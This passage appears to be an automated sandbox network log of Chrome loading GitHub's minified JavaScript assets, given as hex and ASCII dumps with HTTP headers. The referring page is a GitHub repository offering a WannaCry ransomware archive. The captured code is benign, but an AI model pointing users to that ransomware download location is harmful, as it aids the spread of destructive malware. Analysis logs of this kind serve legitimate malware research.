                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 63 61 74 69 6f 6e 2e 68 61 73 68 7d 29 2c 28 30 2c 77 2e 6f 6e 29 28 22 63 6c 69 63 6b 22 2c 22 2e 6a 73 2d 70 65 72 6d 61 6c 69 6e 6b 2d 73 68 6f 72 74 63 75 74 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3b 74 72 79 7b 28 30 2c 24 2e 6c 4f 29 28 6e 75 6c 6c 2c 22 22 2c 74 2e 68 72 65 66 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 29 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 74 2e 68 72 65 66 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 7d 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 6a 73 2d 70 65 72 6d 61 6c 69 6e 6b 2d 72 65 70
                                                                                      Data Ascii: cation.hash}),(0,w.on)("click",".js-permalink-shortcut",function(e){let t=e.currentTarget;try{(0,$.lO)(null,"",t.href+window.location.hash)}catch(e){window.location.href=t.href+window.location.hash}for(let e of document.querySelectorAll(".js-permalink-rep
                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 7d 7d 29 2c 28 30 2c 54 2e 4e 37 29 28 22 2e 73 6d 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 22 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 48 54 4d 4c 45 6c 65 6d 65 6e 74 2c 61 64 64 28 65 29 7b 6e 30 2e 6f 62 73 65 72 76 65 28 65 29 7d 2c 72 65 6d 6f 76 65 28 65 29 7b 28 30 2c 6e 74 2e 54 7a 29 28 65 29 2c 6e 30 2e 75 6e 6f 62 73 65 72 76 65 28 65 29 7d 7d 29 2c 28 30 2c 77 2e 6f 6e 29 28 22 63 6c 69 63 6b 22 2c 22 2e 6a 73 2d 74 6f 67 67 6c 65 2d 61 70 70 68 65 61 64 65 72 2d 73 65 61 72 63 68 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 67 6c 6f 62 61 6c 2d 62 61 72 2d 73 65 63 6f 6e 64 2d 72 6f 77 22 29 3b 69 66 28 65 26 26 28 65 2e 74 6f 67 67 6c 65 41 74 74
                                                                                      Data Ascii: }}),(0,T.N7)(".sm-search-input",{constructor:HTMLElement,add(e){n0.observe(e)},remove(e){(0,nt.Tz)(e),n0.unobserve(e)}}),(0,w.on)("click",".js-toggle-appheader-search",function(){let e=document.querySelector(".js-global-bar-second-row");if(e&&(e.toggleAtt
                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 3d 74 2e 63 6c 6f 73 65 73 74 28 22 74 61 62 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2c 72 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 66 69 6c 74 65 72 61 62 6c 65 2d 66 69 65 6c 64 2c 20 5b 64 61 74 61 2d 66 69 6c 74 65 72 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2d 69 6e 70 75 74 5d 22 29 3b 69 66 28 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 29 7b 6c 65 74 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 66 69 6c 74 65 72 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 3b 65 26 26 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 2c 65 29 2c 72 2e 66 6f 63 75 73 28 29 7d 7d 29 2c 28 30 2c 77 2e 6f 6e 29 28 22 74 61 62 2d 63 6f 6e 74 61 69 6e 65
                                                                                      Data Ascii: =t.closest("tab-container"),r=n.querySelector(".js-filterable-field, [data-filter-placeholder-input]");if(r instanceof HTMLInputElement){let e=t.getAttribute("data-filter-placeholder");e&&r.setAttribute("placeholder",e),r.focus()}}),(0,w.on)("tab-containe
                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 72 64 4f 70 74 69 6f 6e 57 69 74 68 45 72 72 6f 72 28 74 29 2c 65 7d 72 65 6e 64 65 72 50 61 73 73 77 6f 72 64 4f 70 74 69 6f 6e 57 69 74 68 45 72 72 6f 72 28 65 29 7b 74 68 69 73 2e 73 68 6f 77 50 61 73 73 77 6f 72 64 28 29 2c 74 68 69 73 2e 73 68 6f 77 45 72 72 6f 72 4d 65 73 73 61 67 65 28 65 29 7d 72 65 73 65 74 50 72 6f 6d 70 74 28 29 7b 74 68 69 73 2e 68 69 64 65 45 72 72 6f 72 4d 65 73 73 61 67 65 28 29 2c 74 68 69 73 2e 69 73 57 65 62 41 75 74 68 6e 41 76 61 69 6c 61 62 6c 65 28 29 26 26 74 68 69 73 2e 68 69 64 65 57 65 62 41 75 74 68 6e 28 29 2c 74 68 69 73 2e 69 73 47 69 74 48 75 62 4d 6f 62 69 6c 65 41 76 61 69 6c 61 62 6c 65 28 29 26 26 74 68 69 73 2e 68 69 64 65 47 69 74 48 75 62 4d 6f 62 69 6c 65 28 29 2c 74 68 69 73 2e 69 73 54 6f 74 70 41
                                                                                      Data Ascii: rdOptionWithError(t),e}renderPasswordOptionWithError(e){this.showPassword(),this.showErrorMessage(e)}resetPrompt(){this.hideErrorMessage(),this.isWebAuthnAvailable()&&this.hideWebAuthn(),this.isGitHubMobileAvailable()&&this.hideGitHubMobile(),this.isTotpA
                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 74 3d 6e 3f 60 22 24 7b 6e 7d 22 60 3a 22 22 29 7d 29 2c 28 30 2c 53 2e 41 43 29 28 22 2e 6a 73 2d 75 73 65 72 2d 6c 69 73 74 2d 6d 65 6e 75 2d 66 6f 72 6d 22 2c 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 3b 74 72 79 7b 6e 3d 61 77 61 69 74 20 74 2e 6a 73 6f 6e 28 29 7d 63 61 74 63 68 28 74 29 7b 28 30 2c 76 2e 76 29 28 29 2c 28 30 2c 77 2e 66 29 28 65 2c 22 75 73 65 72 2d 6c 69 73 74 2d 6d 65 6e 75 2d 66 6f 72 6d 3a 65 72 72 6f 72 22 2c 74 29 3b 72 65 74 75 72 6e 7d 69 66 28 6e 2e 6a 73 6f 6e 2e 64 69 64 53 74 61 72 29 7b 6c 65 74 20 74 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 6a 73 2d 74 6f 67 67 6c 65 72 2d 63 6f 6e 74 61 69 6e 65 72 22 29 3b 74 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 6f 6e 22 29 3b 6c 65
                                                                                      Data Ascii: t=n?`"${n}"`:"")}),(0,S.AC)(".js-user-list-menu-form",async function(e,t){let n;try{n=await t.json()}catch(t){(0,v.v)(),(0,w.f)(e,"user-list-menu-form:error",t);return}if(n.json.didStar){let t=e.closest(".js-toggler-container");t&&t.classList.add("on");le


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      42192.168.2.1649746185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC729OUTGET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-d0256ebff5cd.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 11556
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:34 GMT
                                                                                      ETag: 0x8DBD4BAB3A8F911
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 2191903
                                                                                      X-Served-By: cache-iad-kjyo7100084-IAD, cache-ewr18183-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1220, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 3aefc3278e232e522888f819cda687c70f409b24
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 35 39 37 35 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 29 29 72 65 74 75 72 6e 20 6e 65 77 20 6f 3b 74 68 69 73 2e 73 69 7a 65 3d 30 2c 74 68 69 73 2e
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js"],{59753:(e,t,n)=>{function o(){if(!(this instanceof o))return new o;this.size=0,this.
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 70 70 65 72 43 61 73 65 28 29 5d 7d 7d 29 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 65 73 2e 64 65 66 61 75 6c 74 3d 7b 6e 61 6d 65 3a 22 55 4e 49 56 45 52 53 41 4c 22 2c 73 65 6c 65 63 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 30 7d 2c 65 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 21 30 5d 7d 7d 2c 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 4d 61 70 3f 77 69 6e 64 6f 77 2e 4d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 6d 61 70 3d 7b 7d 7d 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 61 70 5b 65 2b
                                                                                      Data Ascii: pperCase()]}}),o.prototype.indexes.default={name:"UNIVERSAL",selector:function(){return!0},element:function(){return[!0]}},r="function"==typeof window.Map?window.Map:function(){function e(){this.map={}}return e.prototype.get=function(e){return this.map[e+
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 65 2c 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 76 61 72 20 6e 2c 6f 2c 72 2c 61 2c 69 2c 73 2c 6c 2c 63 2c 64 3d 74 68 69 73 2e 61 63 74 69 76 65 49 6e 64 65 78 65 73 2c 66 3d 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 73 3d 5b 5d 2c 68 3d 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 4f 62 6a 65 63 74 73 2c 70 3d 7b 7d 2c 67 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 72 3d 30 2c 6e 3d 75 28 74 68 69 73 2e 69 6e 64 65 78 65 73 2c 65 29 3b 72 3c 6e 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 66 6f 72 28 6f 3d 6e 5b 72 5d 2c 61 3d 64 2e 6c 65 6e 67 74 68 3b 61 2d 2d 3b 29 69 66 28 73 3d 64 5b 61 5d 2c 6f 2e 69 6e 64 65 78 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 73 29 29 7b 69 66 28 6c 3d 73 2e 6d 61 70
                                                                                      Data Ascii: e,t){if("string"==typeof e){var n,o,r,a,i,s,l,c,d=this.activeIndexes,f=this.selectors=[],h=this.selectorObjects,p={},g=1==arguments.length;for(r=0,n=u(this.indexes,e);r<n.length;r++)for(o=n[r],a=d.length;a--;)if(s=d[a],o.index.isPrototypeOf(s)){if(l=s.map
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 29 7b 67 2e 73 65 74 28 74 68 69 73 2c 21 30 29 2c 62 2e 73 65 74 28 74 68 69 73 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 72 65 74 75 72 6e 20 6d 2e 67 65 74 28 74 68 69 73 29 7c 7c 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 2c 74 29 7b 79 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 63 75 72 72 65 6e 74 54 61 72 67 65 74 22 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 74 7c 7c 79 2e 67 65 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 65 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 2e 65 76 65 6e 74 50 68 61 73 65 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65
                                                                                      Data Ascii: )}function A(){g.set(this,!0),b.set(this,!0)}function x(){return m.get(this)||null}function k(e,t){y&&Object.defineProperty(e,"currentTarget",{configurable:!0,enumerable:!0,get:t||y.get})}function S(e){if(function(e){try{return e.eventPhase,!0}catch(e){re
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 7b 69 66 28 61 2e 68 61 73 28 65 29 29 72 65 74 75 72 6e 20 61 2e 67 65 74 28 65 29 3b 6c 65 74 20 74 3d 21 31 2c 6e 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 65 3d 3e 7b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 65 29 69 66 28 22 61 74 74 72 69 62 75 74 65 73 22 3d 3d 3d 74 2e 74 79 70 65 26 26 74 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 29 64 28 74 2e 74 61 72 67 65 74 29 3b 65 6c 73 65 20 69 66 28 22 63 68 69 6c 64 4c 69 73 74 22 3d 3d 3d 74 2e 74 79 70 65 26 26 74 2e 61 64 64 65 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 29 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 74 2e 61 64 64 65 64 4e 6f 64 65 73 29 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 26 26 73 28 65 29 7d 29 3b 6e 2e 6f 62
                                                                                      Data Ascii: {if(a.has(e))return a.get(e);let t=!1,n=new MutationObserver(e=>{for(let t of e)if("attributes"===t.type&&t.target instanceof Element)d(t.target);else if("childList"===t.type&&t.addedNodes.length)for(let e of t.addedNodes)e instanceof Element&&s(e)});n.ob
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 28 6e 29 3d 3d 3d 65 29 72 65 74 75 72 6e 20 6f 7d 6c 65 74 20 66 3d 65 3d 3e 53 74 72 69 6e 67 28 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 2e 64 65 73 63 72 69 70 74 69 6f 6e 3a 65 29 2e 72 65 70 6c 61 63 65 28 2f 28 5b 41 2d 5a 5d 28 24 7c 5b 61 2d 7a 5d 29 29 2f 67 2c 22 2d 24 31 22 29 2e 72 65 70 6c 61 63 65 28 2f 2d 2d 2f 67 2c 22 2d 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 2d 7c 2d 24 2f 2c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 68 3d 28 65 2c 74 3d 22 70 72 6f 70 65 72 74 79 22 29 3d 3e 7b 6c 65 74 20 6e 3d 66 28 65 29 3b 69 66 28 21 6e 2e 69 6e 63 6c 75 64 65 73 28 22 2d 22 29 29 74 68 72 6f 77 20 6e 65 77 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e 28 60 24 7b 74 7d 3a 20 24 7b 53 74 72 69 6e 67 28 65 29 7d 20 69 73 20
                                                                                      Data Ascii: (n)===e)return o}let f=e=>String("symbol"==typeof e?e.description:e).replace(/([A-Z]($|[a-z]))/g,"-$1").replace(/--/g,"-").replace(/^-|-$/,"").toLowerCase(),h=(e,t="property")=>{let n=f(e);if(!n.includes("-"))throw new DOMException(`${t}: ${String(e)} is
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 29 7d 3b 6c 65 74 20 61 3d 65 2e 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 7c 7c 5b 5d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 22 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 74 2e 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 28 74 68 69 73 2c 61 29 7d 2c 73 65 74 28 65 29 7b 61 3d 65 7d 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 7c 7c 5b 5d 2c 6e 3d 65 2e 61 74 74 72 50 72 65 66 69 78 3f 3f 22 64 61 74 61 2d 22 2c 6f 3d 65 3d 3e 68 28 60 24 7b 6e 7d 24 7b 65 7d 60 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f
                                                                                      Data Ascii: )};let a=e.observedAttributes||[];Object.defineProperty(e,"observedAttributes",{configurable:!0,get(){return t.observedAttributes(this,a)},set(e){a=e}}),function(e){let t=e.observedAttributes||[],n=e.attrPrefix??"data-",o=e=>h(`${n}${e}`);Object.definePro
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 74 22 29 2e 61 64 64 28 74 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 75 28 74 68 69 73 2c 74 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 65 2c 74 29 7b 76 28 65 2c 22 74 61 72 67 65 74 73 22 29 2e 61 64 64 28 74 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6f 3d 5b 5d 3b 69 66 28 65 2e 73 68 61 64 6f 77 52 6f 6f 74 29 66 6f 72 28 6c 65 74 20 72 20 6f 66 20 65 2e 73
                                                                                      Data Ascii: t").add(t),Object.defineProperty(e,t,{configurable:!0,get(){return u(this,t)}})}function A(e,t){v(e,"targets").add(t),Object.defineProperty(e,t,{configurable:!0,get(){return function(e,t){let n=e.tagName.toLowerCase(),o=[];if(e.shadowRoot)for(let r of e.s
                                                                                      2024-03-23 14:47:24 UTC532INData Raw: 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 67 65 74 28 74 29 7c 7c 6e 29 7b 6c 65 74 20 6f 3d 6e 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6c 6f 61 64 2d 6f 6e 22 29 7c 7c 22 72 65 61 64 79 22 2c 72 3d 6f 20 69 6e 20 43 3f 43 5b 6f 5d 3a 43 2e 72 65 61 64 79 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 6b 2e 67 65 74 28 74 29 7c 7c 5b 5d 29 72 28 74 29 2e 74 68 65 6e 28 65 29 3b 6b 2e 64 65 6c 65 74 65 28 74 29 2c 4f 2e 64 65 6c 65 74 65 28 65 29 7d 7d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 2c 74 29 7b 6b 2e 68 61 73 28 65 29 7c 7c 6b 2e 73 65 74 28 65 2c 6e 65 77 20 53 65 74 29 2c 6b 2e 67 65 74 28 65 29 2e 61 64 64 28 74 29 2c 50 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2c 6f 7c 7c 28 6f 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f
                                                                                      Data Ascii: tomElements.get(t)||n){let o=n?.getAttribute("data-load-on")||"ready",r=o in C?C[o]:C.ready;for(let e of k.get(t)||[])r(t).then(e);k.delete(t),O.delete(e)}}}))}function j(e,t){k.has(e)||k.set(e,new Set),k.get(e).add(t),P(document.body),o||(o=new MutationO


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      43192.168.2.1649747185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC656OUTGET /assets/notifications-global-352d84c6cc82.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 12912
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:13 GMT
                                                                                      ETag: 0x8DC33C6C201D612
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 2069400
                                                                                      X-Served-By: cache-iad-kjyo7100064-IAD, cache-ewr18154-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 574, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 76e6982a44027f18139e2004e80e6188a9f51a00
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 6e 6f 74 69 66 69 63 61 74 69 6f 6e 73 2d 67 6c 6f 62 61 6c 22 5d 2c 7b 35 38 33 35 33 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 64 28 74 2c 7b 48 3a 28 29 3d 3e 6c 2c 76 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 69 3d 6f 28 35 39 37 35 33 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 61 6a 61 78 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 29 3b 65 26 26 28 65 2e 68 69 64 64 65 6e 3d 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 6c 65 74 20 65
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["notifications-global"],{58353:(e,t,o)=>{o.d(t,{H:()=>l,v:()=>s});var i=o(59753);function s(){let e=document.getElementById("ajax-error-message");e&&(e.hidden=!1)}function l(){let e
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 75 62 6d 69 74 43 75 73 74 6f 6d 46 6f 72 6d 28 65 29 7b 61 77 61 69 74 20 74 68 69 73 2e 73 75 62 6d 69 74 46 6f 72 6d 28 65 29 2c 74 68 69 73 2e 63 6c 6f 73 65 4d 65 6e 75 28 29 7d 61 73 79 6e 63 20 73 75 62 6d 69 74 46 6f 72 6d 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 28 30 2c 6c 2e 48 29 28 29 3b 6c 65 74 20 74 3d 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2c 6f 3d 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 74 29 2c 69 3d 61 77 61 69 74 20 73 65 6c 66 2e 66 65 74 63 68 28 74 2e 61 63 74 69 6f 6e 2c 7b 6d 65 74 68 6f 64 3a 74 2e 6d 65 74 68 6f 64 2c 62 6f 64 79 3a 6f 2c 68 65 61 64 65 72 73 3a 7b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 3a 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 2c 41 63 63 65 70 74 3a 22
                                                                                      Data Ascii: ubmitCustomForm(e){await this.submitForm(e),this.closeMenu()}async submitForm(e){e.preventDefault(),(0,l.H)();let t=e.currentTarget,o=new FormData(t),i=await self.fetch(t.action,{method:t.method,body:o,headers:{"X-Requested-With":"XMLHttpRequest",Accept:"
